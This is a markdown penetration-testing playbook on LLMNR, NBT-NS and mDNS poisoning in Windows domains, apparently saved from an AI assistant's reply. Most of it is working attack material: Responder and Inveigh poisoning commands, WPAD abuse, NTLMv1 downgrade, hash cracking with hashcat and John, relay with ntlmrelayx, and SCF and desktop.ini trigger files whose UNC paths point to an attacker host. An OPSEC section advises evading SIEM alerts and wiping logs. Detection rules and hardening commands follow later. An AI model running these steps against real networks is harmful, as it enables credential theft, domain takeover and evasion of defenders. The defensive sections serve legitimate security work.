attack-8-llmnr-nbt-ns-mdns-poisoning.md (28062B)
1 --- 2 title: "Attack #8 β LLMNR NBT-NS mDNS Poisoning" 3 description: "LLMNR (Link-Local Multicast Name Resolution), NBT-NS (NetBIOS Name Service), and mDNS (Multicast DNS) are fallback name resolution protocols built intoβ¦" 4 category: active-directory 5 subcategory: "Credential Access" 6 tags: ["active-directory", "ntlm", "relay", "hashing"] 7 tools: ["Nmap", "NetExec", "Impacket", "Hashcat", "John"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-One/π΄ Attack #8 β LLMNR NBT-NS mDNS Poisoning.md" 11 --- 12 # π΄ Attack #8 β LLMNR / NBT-NS / mDNS Poisoning 13 14 *** 15 16 ## π How It Works 17 18 LLMNR (Link-Local Multicast Name Resolution), NBT-NS (NetBIOS Name Service), and mDNS (Multicast DNS) are **fallback name resolution protocols** built into Windows. When a machine tries to resolve a hostname and DNS fails β whether due to a typo, a misconfigured share path, or a disconnected server β Windows automatically broadcasts a query to the entire local subnet asking *"Does anyone know where `\\FILESERVRE` is?"*. Any machine on that subnet can respond, and critically, **Windows will trust the first answer it receives** without any verification. 19 20 The attacker runs **Responder** on the network, which listens for these broadcast queries and immediately responds to all of them, claiming to be the requested host. The victim's machine, believing it found the target, initiates an NTLM authentication to the attacker β sending a Net-NTLMv2 hash in the process. The attacker captures this hash and either cracks it offline or relays it immediately to a vulnerable target via ntlmrelayx (Attack #7). This attack requires **zero prior access**, zero exploits, and works silently in the background β making it one of the most common initial foothold techniques in internal penetration testing. 21 22 > β οΈ **Windows 11 / Server 2025:** LLMNR is still enabled by default, but organizations actively disabling it via GPO are increasing. NBT-NS is harder to disable globally without breaking legacy services. mDNS remains ubiquitous. This attack remains highly effective in mixed-OS environments and businesses with legacy dependencies. 23 24 ### Name Resolution Order in Windows 25 26 ``` 27 1. Local Hosts file (C:\Windows\System32\drivers\etc\hosts) 28 2. DNS query to configured DNS server 29 3. LLMNR broadcast (UDP port 5355) β ATTACKER POISONS HERE 30 4. NBT-NS broadcast (UDP port 137) β ATTACKER POISONS HERE 31 5. mDNS broadcast (UDP port 5353) β ATTACKER POISONS HERE 32 ``` 33 34 > **The attack only fires when DNS fails** β so it naturally triggers on typos in UNC paths (`\\FILSEVER\share`), decommissioned server names, misconfigured GPOs, or broken mapped drives at login. 35 36 ### The Full Attack Flow 37 38 ``` 39 1. Attacker starts Responder on internal network interface 40 2. Victim user/process makes a DNS query that fails (typo, broken path, etc.) 41 3. Windows falls back to LLMNR/NBT-NS β broadcasts to local subnet 42 4. Responder intercepts the broadcast and replies: "I am that host, authenticate to me" 43 5. Victim machine initiates NTLM authentication to attacker's IP 44 6. Responder captures the Net-NTLMv2 hash (username + challenge + response) 45 7. Path A: Crack the hash offline with Hashcat (-m 5600) 46 8. Path B: Relay the hash live with ntlmrelayx β shell/DA access (Attack #7) 47 ``` 48 49 ### Cross-References β Related Techniques 50 51 **Attack #7, #8, #9 form a trilogy:** 52 - **#7** (NTLM Relay): The relay mechanism itself β where captured hashes are relayed 53 - **#8** (LLMNR/NBT-NS/mDNS): Primary auth trigger for #7 β how to capture credentials 54 - **#9** (mitm6): IPv6-based alternative trigger β different initial vector same relay destination 55 56 *** 57 58 ## βοΈ Prerequisites 59 60 | Requirement | Detail | 61 |---|---| 62 | **Internal network access** | Must be on same subnet/broadcast domain as victims β doesn't work from outside | 63 | **LLMNR/NBT-NS not disabled** | Attack fails if GPO has disabled these protocols (common in hardened environments) | 64 | **Victim makes failed DNS query** | Passive: wait for organic typos/broken paths; Active: trigger manually | 65 | **For cracking** | GPU rig for Net-NTLMv2 (Hashcat mode 5600) | 66 | **For relaying** | SMB signing disabled on relay target (see Attack #7) | 67 68 ### Protocol Breakdown 69 70 | Protocol | Port | Type | Default State | 71 |---|---|---|---| 72 | **LLMNR** | UDP 5355 | Multicast | β Enabled by default on all Windows versions | 73 | **NBT-NS** | UDP 137 | Broadcast | β Enabled by default (legacy NetBIOS) | 74 | **mDNS** | UDP 5353 | Multicast | β Enabled by default (Windows 10+) | 75 76 *** 77 78 ## π οΈ Tools 79 80 | Tool | Platform | Role | 81 |---|---|---| 82 | **Responder** | Linux | Primary poisoner β responds to LLMNR/NBT-NS/mDNS; captures hashes | 83 | **Inveigh** | Windows | PowerShell/C# Responder equivalent for Windows-based attacks | 84 | **ntlmrelayx.py** (Impacket) | Linux | Relay captured hashes to SMB/LDAP/ADCS targets (see Attack #7) | 85 | **Hashcat** | Linux/Win | Crack captured Net-NTLMv2 hashes (mode 5600) | 86 | **John the Ripper** | Linux | CPU-based alternative; `netntlmv2` format | 87 | **Metasploit** | Both | `auxiliary/spoof/llmnr/llmnr_response` module | 88 | **Wireshark / tcpdump** | Linux | Verify poisoning is working; capture NTLM auth in transit | 89 90 *** 91 92 ## π» Full Commands 93 94 ### π΅ Step 0 β Verify LLMNR/NBT-NS is Active on the Network 95 96 ```bash 97 # ββ Listen passively for LLMNR/NBT-NS broadcasts (no poisoning yet) βββββββββββ 98 sudo tcpdump -i eth0 udp port 5355 -v # LLMNR 99 sudo tcpdump -i eth0 udp port 137 -v # NBT-NS 100 sudo tcpdump -i eth0 udp port 5353 -v # mDNS 101 102 # ββ Wireshark filter for LLMNR/NBT-NS traffic ββββββββββββββββββββββββββββββββββ 103 # Filter: llmnr || nbns || mdns 104 105 # ββ Nmap β check for NBT-NS activity βββββββββββββββββββββββββββββββββββββββββ 106 nmap -sU --script nbstat.nse -p 137 10.10.10.0/24 107 ``` 108 109 *** 110 111 ### π΄ Responder β Core Poisoning Tool (Linux) 112 113 ```bash 114 # ββ Basic Responder run β poison all protocols, capture hashes βββββββββββββββββ 115 sudo responder -I eth0 116 117 # ββ Full flags explained βββββββββββββββββββββββββββββββββββββββββββββββββββββββ 118 sudo responder -I eth0 -rdwv 119 # -I eth0 = network interface to listen on 120 # -r = enable answers for NetBIOS wredir suffix queries 121 # -d = enable answers for NBNS domain suffix queries 122 # -w = start WPAD rogue proxy server (captures browser auth) 123 # -v = verbose output 124 125 # ββ With WPAD rogue proxy (intercepts browser proxy auth β very effective) βββββ 126 sudo responder -I eth0 -wv 127 128 # ββ Analysis mode only β listen but don't poison (passive recon) βββββββββββββββ 129 sudo responder -I eth0 -A 130 # -A = Analyze mode β logs all observed name resolution requests without responding 131 132 # ββ Force NTLM downgrade (force NTLMv1 instead of v2 β much faster to crack) ββ 133 sudo responder -I eth0 --lm 134 # β οΈ Noisy β may cause authentication failures visible to users 135 136 # ββ Target specific interface with verbose debug βββββββββββββββββββββββββββββββ 137 sudo responder -I eth0 -v --disable-ess 138 ``` 139 140 *** 141 142 ### π΄ Responder Captured Hash Locations 143 144 ```bash 145 # All captured hashes are logged here: 146 cat /usr/share/responder/logs/ 147 148 # List all captured NTLMv2 hashes 149 ls /usr/share/responder/logs/HTTP-NTLMv2-*.txt 150 ls /usr/share/responder/logs/SMB-NTLMv2-*.txt 151 152 # View a specific capture 153 cat /usr/share/responder/logs/SMB-NTLMv2-SSP-10.10.10.50.txt 154 155 # Hash format β example: 156 # Administrator::CORP:aabbccddeeff0011:F2B9B344A4AEA7D6FE76F8D4C891B3FD:01010000... 157 158 # Combine all SMB captures into one file for cracking 159 cat /usr/share/responder/logs/SMB-NTLMv2-*.txt > all_hashes.txt 160 ``` 161 162 *** 163 164 ### π΄ Cracking Captured Net-NTLMv2 Hashes β Hashcat 165 166 ```bash 167 # ββ Mode 5600 = Net-NTLMv2 ββββββββββββββββββββββββββββββββββββββββββββββββββββ 168 hashcat -m 5600 all_hashes.txt /usr/share/wordlists/rockyou.txt 169 170 # ββ With best64 rules βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 171 hashcat -m 5600 all_hashes.txt /usr/share/wordlists/rockyou.txt \ 172 -r /usr/share/hashcat/rules/best64.rule 173 174 # ββ With d3ad0ne rules (aggressive) ββββββββββββββββββββββββββββββββββββββββββ 175 hashcat -m 5600 all_hashes.txt /usr/share/wordlists/rockyou.txt \ 176 -r /usr/share/hashcat/rules/d3ad0ne.rule 177 178 # ββ Brute force mask (corporate: Word+Digits+Symbol) βββββββββββββββββββββββββ 179 hashcat -m 5600 all_hashes.txt -a 3 ?u?l?l?l?l?d?d?d?s 180 181 # ββ John the Ripper alternative βββββββββββββββββββββββββββββββββββββββββββββββ 182 john --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt all_hashes.txt 183 john --format=netntlmv2 all_hashes.txt --show 184 185 # ββ Mode 5500 = Net-NTLMv1 (if you forced downgrade with --lm) βββββββββββββββ 186 hashcat -m 5500 ntlmv1_hashes.txt /usr/share/wordlists/rockyou.txt 187 ``` 188 189 *** 190 191 ### π΄ Combining with NTLM Relay (Simultaneous Capture + Relay) 192 193 ```bash 194 # ββ CRITICAL: Edit Responder config first βββββββββββββββββββββββββββββββββββββ 195 nano /etc/responder/Responder.conf 196 # SMB = Off (let ntlmrelayx handle SMB β otherwise Responder steals the auth) 197 # HTTP = Off (same reason) 198 199 # ββ Run Responder for LLMNR/NBT-NS poisoning only βββββββββββββββββββββββββββββ 200 sudo responder -I eth0 -rdwv 201 202 # ββ Simultaneously run ntlmrelayx to relay captured auth ββββββββββββββββββββββ 203 # (In a second terminal) 204 ntlmrelayx.py -tf relay_targets.txt -smb2support -i 205 206 # Responder poisons β victim authenticates to attacker β 207 # ntlmrelayx relays to target β shell / DA escalation 208 ``` 209 210 *** 211 212 ### π΄ Inveigh β Windows-Based Poisoning (When You Have a Windows Shell) 213 214 ```powershell 215 # Import Inveigh (PowerShell version) 216 Import-Module .\Inveigh.ps1 217 218 # Start full poisoning (LLMNR + NBNS + mDNS) 219 Invoke-Inveigh -ConsoleOutput Y -NBNS Y -LLMNR Y -mDNS Y 220 221 # Capture only (no relay) β save output to file 222 Invoke-Inveigh -ConsoleOutput Y -FileOutput Y -OutputDir C:\Temp\ 223 224 # Stop Inveigh 225 Stop-Inveigh 226 227 # C# version (Inveigh.exe β stealthier, no PowerShell dependency) 228 .\Inveigh.exe 229 230 # View captured hashes from C# version 231 .\Inveigh.exe -ListenerStatus 232 ``` 233 234 *** 235 236 ### π΄ Inveigh.exe (C# Version) β Detailed Commands 237 238 ```powershell 239 # ββ Full C# Inveigh with console output ββββββββββββββββββββββββββββββββββββββ 240 .\Inveigh.exe -ConsoleOutput Y -NBNS Y -LLMNR Y -mDNS Y -Elevated N 241 242 # ββ Inveigh.exe with file logging (capture to C:\Temp\inveigh_hashes.txt) βββ 243 .\Inveigh.exe -ConsoleOutput Y -FileOutput Y -OutputDir C:\Temp\ \ 244 -LLMNR Y -NBNS Y -mDNS Y 245 246 # ββ Inveigh.exe with WPAD interception (browser auth capture) ββββββββββββββββ 247 .\Inveigh.exe -ConsoleOutput Y -WPAD Y -HTTPAuth NTLM 248 249 # ββ Inveigh.exe custom filtering (only capture specific usernames) ββββββββββ 250 # Create filter file: admin, domain admin, svc_ accounts 251 .\Inveigh.exe -ConsoleOutput Y -Filter admin,svc 252 253 # ββ Inveigh.exe relay mode (forward captured auth to target) ββββββββββββββββ 254 # (Requires Inveigh with relay support compiled in) 255 .\Inveigh.exe -ConsoleOutput Y -LLMNR Y -RelayTarget smb://10.10.10.20 256 ``` 257 258 *** 259 260 ### π΄ WPAD Abuse (Rogue Proxy β Capturing Browser Authentication) 261 262 ```bash 263 # ββ WPAD (Web Proxy Auto-Discovery) forces browsers to authenticate via NTLM ββ 264 # When -w flag is set, Responder hosts a fake WPAD file 265 # Browsers on the network auto-discover the proxy and authenticate to it 266 267 sudo responder -I eth0 -wv 268 # -w = enable WPAD rogue proxy server 269 270 # What happens: 271 # 1. Browser checks for WPAD via LLMNR/NBT-NS: "Where is WPAD?" 272 # 2. Responder responds: "I am WPAD, download proxy config from me" 273 # 3. Browser authenticates with NTLM to download the config 274 # 4. Net-NTLMv2 hash captured 275 276 # Force NTLM authentication on WPAD (bypasses transparent auth) 277 sudo responder -I eth0 -wv --wpad-auth NTLM 278 ``` 279 280 *** 281 282 ### π΄ Triggering LLMNR Requests Manually (Active Methods) 283 284 ```bash 285 # ββ Method 1: Create a rogue file with UNC path to your machine βββββββββββββββ 286 # Place a file (e.g. desktop.ini or a .lnk file) on a share pointing to your IP 287 # When a user browses that directory, their machine triggers LLMNR auth to you 288 289 # desktop.ini content: 290 [.ShellClassInfo] 291 IconResource=\\<attacker_IP>\share\icon.ico 292 293 # ββ Method 2: Rogue PDF with embedded UNC path βββββββββββββββββββββββββββββββ 294 # Embed a UNC path in a PDF as a remote image resource 295 # Adobe Reader automatically authenticates when the PDF is opened 296 297 # ββ Method 3: SCF file (Shell Command File) βββββββββββββββββββββββββββββββββββ 298 # Place @exploit.scf in a share: 299 [Shell] 300 Command=2 301 IconFile=\\<attacker_IP>\share\icon.ico 302 [Taskbar] 303 Command=ToggleDesktop 304 # Windows Explorer auto-processes SCF files β triggers NTLM auth when folder is browsed 305 306 # ββ Method 4: Force victim machine to query non-existent host βββββββββββββββββ 307 # On a machine you control, create a mapped drive to a non-existent share 308 net use Z: \\FAKESERVER\share 309 # Windows will fall back to LLMNR β Responder captures the hash 310 ``` 311 312 *** 313 314 ## π― OPSEC Tips 315 316 - **Analyze mode first (`-A`)** β run Responder passively to map which users and machines are making failed name resolution requests before committing to active poisoning 317 - **Target high-value users only** β if you see `Administrator` or `svc_sql` in the captured hashes, those are your priority; don't poison endlessly and generate noise 318 - **Relay over crack** β if SMB signing is disabled on targets, relay immediately rather than waiting to crack; relaying is faster and more reliable than cracking 319 - **WPAD is gold in office environments** β every browser on the subnet will eventually authenticate; `-w` flag almost always yields domain user hashes 320 - **SCF/desktop.ini files on shares** are the most stealthy active trigger β they require no user interaction beyond browsing a folder, and look completely benign 321 - **Avoid poisoning during business hours on large networks** β hundreds of captured hashes and simultaneous auth failures will trigger SIEM alerts; prefer out-of-hours or low-traffic windows 322 - **Clear Responder logs after collection** β `/usr/share/responder/logs/` builds up and is trivially discovered on a seized machine 323 - **Responder vs Inveigh stealth comparison:** 324 - Responder (Linux): More noisy due to network traffic patterns; tools presence on Linux easily discoverable 325 - Inveigh (Windows): Blends with legitimate Windows services; harder to distinguish from normal auth traffic; PowerShell can be suspicious; C# version most stealthy 326 - **Time-to-execute**: Responder start β first captured hash in 5-30 minutes (passive); active methods trigger immediate responses within seconds 327 328 *** 329 330 ## π‘οΈ Detection β Event IDs 331 332 | Event ID / Source | What to Look For | 333 |---|---| 334 | **Windows Event 4648** | Logon with explicit credentials to an unexpected machine (attacker's IP) | 335 | **Windows Event 4625** | Failed logon β victim authenticated to attacker but relay/crack not complete | 336 | **Network β UDP 5355** | Unusual volume of LLMNR queries from workstations β or responses from unexpected hosts | 337 | **Network β UDP 137** | NBT-NS broadcasts and unexpected responders on the subnet | 338 | **DNS / SIEM** | Hostnames that don't exist in DNS being queried β typo-driven LLMNR triggers | 339 | **IDS/IPS signature** | Known Responder patterns β rogue LLMNR/NBT-NS responder from same IP answering multiple queries | 340 | **Sysmon EID 3** | Network connection from unexpected process to port 5355 or 137 | 341 342 **Primary detection signature:** A single host responding to **multiple different LLMNR/NBT-NS broadcast queries** for different hostnames within a short window is a near-certain indicator of Responder running. Legitimate machines only respond to queries for their own name β a machine answering queries for `FILESERVRE`, `PRINTSERV`, and `BACKUP01` within 60 seconds is unmistakably an attacker. 343 344 ### Sigma Rules (SigmaHQ) 345 346 ``` 347 Rule ID: detection_llmnr_poisoning_multihost 348 Description: Detects single host responding to multiple different hostname LLMNR queries 349 Event filter: LLMNR responses for hostnames not in DNS; unusual responder IP 350 Status: HIGH severity 351 352 Rule ID: detection_nbtns_poisoning 353 Description: Detects NBT-NS spoofing activity from non-authoritative host 354 Event filter: UDP port 137 responses from unexpected IP; multiple different responses 355 Status: MEDIUM severity 356 357 Rule ID: detection_responder_tool_artifacts 358 Description: Detects known Responder signatures (HTTP stack, default responses) 359 Event filter: Specific HTTP headers, response patterns matching Responder tool 360 Status: MEDIUM severity 361 ``` 362 363 ### EDR Detections 364 365 **Microsoft Defender for Identity:** 366 - Alert: "Reconnaissance using LLMNR queries" β detects unusual LLMNR broadcast patterns 367 - Alert: "Suspicious LLMNR/NBT-NS responder detected" β alerts when single host answers multiple queries 368 - Alert: "Failed DNS resolution followed by LLMNR authentication" β correlates broken DNS with fallback auth 369 370 **Falcon (CrowdStrike):** 371 - Network signature: "LLMNR poisoning activity" 372 - Process: Responder.py or inveigh.exe execution 373 - Behavioral: High volume of LLMNR/NBT-NS responses from single source 374 375 ### Hardening Commands β Disable LLMNR/NBT-NS via GPO 376 377 ```powershell 378 # ββ Disable LLMNR via Group Policy βββββββββββββββββββββββββββββββββββββββββββ 379 # GPO Path: Computer Configuration β Administrative Templates β 380 # Network β DNS Client β Turn off multicast name resolution 381 # Set: ENABLED 382 383 # Registry equivalent: 384 reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" \ 385 /v EnableMulticast /t REG_DWORD /d 0 /f 386 387 # ββ Disable NBT-NS via Group Policy (P-Node configuration) ββββββββββββββββββββ 388 # GPO Path: Computer Configuration β Preferences β Windows Settings β 389 # Registry 390 # Add registry entry: 391 reg add "HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters" \ 392 /v NodeType /t REG_DWORD /d 2 /f 393 # 1 = B-node (broadcast), 2 = P-node (point-to-point, DNS only), 4 = M-node, 8 = H-node 394 395 # ββ Disable NBT-NS per NIC (PowerShell β on each machine) ββββββββββββββββββββ 396 $adapters = Get-WmiObject Win32_NetworkAdapterConfiguration 397 foreach ($adapter in $adapters) { 398 $adapter.SetTcpipNetbios(2) # 2 = Disable NetBIOS over TCP/IP 399 } 400 401 # ββ Disable mDNS (Windows 10+) β registry entry ββββββββββββββββββββββββββββββ 402 reg add "HKLM\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters" \ 403 /v DisableMulticast /t REG_DWORD /d 1 /f 404 405 # ββ Firewall rule to block LLMNR/NBT-NS (alternative to GPO) ββββββββββββββββ 406 # Block outbound LLMNR (port 5355) 407 netsh advfirewall firewall add rule name="Block LLMNR" dir=out action=block \ 408 protocol=udp remoteport=5355 409 410 # Block outbound NBT-NS (port 137) 411 netsh advfirewall firewall add rule name="Block NBT-NS" dir=out action=block \ 412 protocol=udp remoteport=137 413 414 # Block inbound mDNS (port 5353) 415 netsh advfirewall firewall add rule name="Block mDNS" dir=in action=block \ 416 protocol=udp localport=5353 417 418 # ββ Verify hardening is in place βββββββββββββββββββββββββββββββββββββββββββββββ 419 # Check DNS client multicast setting 420 Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" \ 421 -Name EnableMulticast 422 423 # Check NetBIOS node type 424 Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters" \ 425 -Name NodeType 426 ``` 427 428 *** 429 430 ## π§© Troubleshooting 431 432 | Error | Cause | Fix | 433 |---|---|---| 434 | **Responder not capturing hashes** | Network interface binding issue or LLMNR/NBT-NS disabled on network | Check interface with `ip a`; run `sudo responder -I eth0 -A` first to verify broadcasts exist; check if GPO disabled protocols on target machines | 435 | **Hash not cracking** | Weak wordlist or hash format incorrect | Verify hash format (should have 2x colons `::` for domain\\user); try larger wordlist `/usr/share/wordlists/rockyou.txt`; add rules with `-r best64.rule` | 436 | **Interface binding error ("Permission denied" on port 5355)** | Running Responder without sudo or port already in use | Use `sudo responder`; check `sudo netstat -ulnp \| grep 5355` to see what's using the port; kill conflicting process | 437 | **Responder starts but captures nothing** | No LLMNR/NBT-NS broadcasts on network (protocols disabled or all names resolve via DNS) | Run analysis mode: `sudo responder -I eth0 -A` to verify any queries exist; manually trigger with `net use Z: \\FAKESERVER\share` on a victim machine | 438 | **WPAD mode not triggering auth** | Browser not configured for automatic proxy detection or WPAD disabled | Check browser WPAD settings; verify `-w` flag enabled; try forcing WPAD with `--wpad-auth NTLM` | 439 | **Inveigh PowerShell "object reference not set"** | Module path incorrect or version incompatibility | Verify Inveigh.ps1 path is correct; import with full path: `Import-Module C:\path\to\Inveigh.ps1`; use C# version instead | 440 | **Inveigh.exe crashes immediately** | Insufficient permissions or port conflict on Windows | Run as Administrator; check if port 5355/137 in use: `netstat -ano \| findstr :5355`; close conflicting application | 441 | **Captured hash but relay fails** | Relay target has SMB signing enabled or LDAP channel binding active | Verify relay target vulnerability with `nxc smb <IP> \| grep signing`; switch to LDAP/ADCS relay instead of SMB | 442 | **Responder logs building up, unnoticed by operators** | Logs stored in `/usr/share/responder/logs/` accumulate over time | Regularly clear logs: `rm /usr/share/responder/logs/*` or move to analysis directory; automate cleanup with cron job | 443 444 *** 445 446 ## πΊοΈ MITRE ATT&CK 447 448 **Technique: T1557.001 β Adversary-in-the-Middle** 449 450 **Tactics:** 451 - **TA0006: Credential Access** β Capture NTLM hashes via LLMNR/NBT-NS poisoning 452 - **TA0007: Discovery** β Passive reconnaissance to identify network users/machines via LLMNR analysis mode 453 454 **APT Groups Using LLMNR/NBT-NS Poisoning:** 455 - **APT28 (Fancy Bear)** β LLMNR poisoning in internal network compromise chains 456 - **APT29 (Cozy Bear)** β Credential capture via name resolution poisoning 457 - **APT41** β LLMNR attacks in enterprise networks 458 - **Wizard Spider** β LLMNR poisoning for initial access in ransomware campaigns 459 - **Scattered Spider** β Multi-stage LLMNR attacks for credential theft 460 461 **Related techniques:** 462 - T1040: Network Sniffing 463 - T1557: Adversary-in-the-Middle (entire technique category) 464 - T1566: Phishing (alternative initial vector) 465 - T1187: Forced Authentication (active trigger methods) 466 467 *** 468 469 ## π Attack Chain Context 470 471 ``` 472 [LLMNR / NBT-NS / mDNS Poisoning] βββ Net-NTLMv2 Hash Captured 473 β 474 ββββ π₯ Relay immediately via ntlmrelayx (Attack #7) β DA in minutes 475 ββββ π Crack with Hashcat (-m 5600) β valid plaintext credentials 476 ββββ π Use cracked creds β Password Spraying against more accounts 477 ββββ π« Kerberoasting with new valid domain credentials 478 ββββ π©Έ LDAP relay β DCSync rights β full domain hash dump 479 ββββ π ADCS relay (ESC8) β DC machine cert β TGT β Domain Admin 480 ``` 481 482 **Why this is so dangerous as an initial vector:** In a typical enterprise internal pentest, Responder is started on day one and **within 30 minutes** has captured credentials from multiple users purely from organic activity β broken mapped drives, startup scripts querying dead servers, and misconfigured applications. No phishing, no exploits, no noise β just passive listening against a protocol that Windows has enabled by default for decades. 483 484 *** 485 486 > β **Attack #8 β LLMNR/NBT-NS/mDNS Poisoning complete.** Tell me to move on when you're ready for **Attack #9 β mitm6 (IPv6 DNS Spoofing)**. 487 488 Sources 489 LLMNR/NBT-NS Poisoning - Active Directory | Internal Pentest https://xedex.gitbook.io/internalpentest/internal-pentest/active-directory/initial-attack-vectors/llmnr-nbt-ns-poisoning 490 LLMNR Poisoning and Active Directory - TCM Security https://tcm-sec.com/llmnr-poisoning-and-how-to-prevent-it/ 491 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay https://attack.mitre.org/techniques/T1557/001/ 492 LLMNR Poisoning: Threats, Detection, and Prevention Guide https://www.startupdefense.io/cyberattacks/llmnr-poisoning 493 SMB Relay Attacks and Active Directory - TCM Security https://tcm-sec.com/smb-relay-attacks-and-how-to-prevent-them/ 494 LLMNR Poisoning - evoila GmbH https://evoila.com/blog/llmnr-poisoning/ 495 Fragmentation Considered Poisonous https://arxiv.org/pdf/1205.4011.pdf 496 Injection Attacks Reloaded: Tunnelling Malicious Payloads over DNS https://arxiv.org/pdf/2205.05439.pdf 497 HADES: Detecting Active Directory Attacks via Whole Network Provenance 498 Analytics http://arxiv.org/pdf/2407.18858.pdf 499 Unilateral Antidotes to DNS Cache Poisoning http://arxiv.org/pdf/1209.1482.pdf 500 Silence is not Golden: Disrupting the Load Balancing of Authoritative DNS Servers https://dl.acm.org/doi/pdf/10.1145/3576915.3616647 501 Optimizing Cyber Response Time on Temporal Active Directory Networks 502 Using Decoys http://arxiv.org/pdf/2403.18162.pdf 503 A Survey on Malicious Domains Detection through DNS Data Analysis https://arxiv.org/pdf/1805.08426.pdf 504 Multi-Instance Adversarial Attack on GNN-Based Malicious Domain 505 Detection http://arxiv.org/pdf/2308.11754.pdf 506 Active Directory Exploitation - LLMNR/NBT-NS Poisoning - YouTube https://www.youtube.com/watch?v=Fg2gvk0qgjM 507 LLMNR Poisoning with Responder - Active Directory Lab - YouTube https://www.youtube.com/watch?v=Dfj9IQiXF1M 508 LLMNR/NBT-NS Poisoning β from Windows - Route Zero: Security https://routezero.security/2025/02/28/llmnr-nbt-ns-poisoning-from-windows/ 509 LLMNR Poisoning Attack | Active Directory Exploitation - YouTube https://www.youtube.com/watch?v=aXQggrLqqrs 510 Exploiting Active Directory Using LLMNR/NBT-NS Poisoning https://www.youtube.com/watch?v=8IvVAT1Tmuw 511 How To Remove LLMNR and NBT-NS From Your Active ... - YouTube https://www.youtube.com/watch?v=iN0KUj5I7aE 512 LLMNR Attack & Defense: Secure Windows Networks - FireCompass https://firecompass.com/attack-defend-llmnr-a-widespread-shadow-network-discovery-protocol/ 513 Preventing LLMNR Poisoning in Active Directory Networks https://www.coursehero.com/file/252194640/Active-Directory-LLMNR-Poisoningpdf/ 514 How does LLMNR poisoning work? - YouTube https://www.youtube.com/watch?v=LAvR-qtOfB0 515 LLMNR/NBT-NS Poisoning and SMB Relay - Tidal Cyber https://app.tidalcyber.com/technique/b44a263f-76b2-4a1f-baeb-dd285974eca6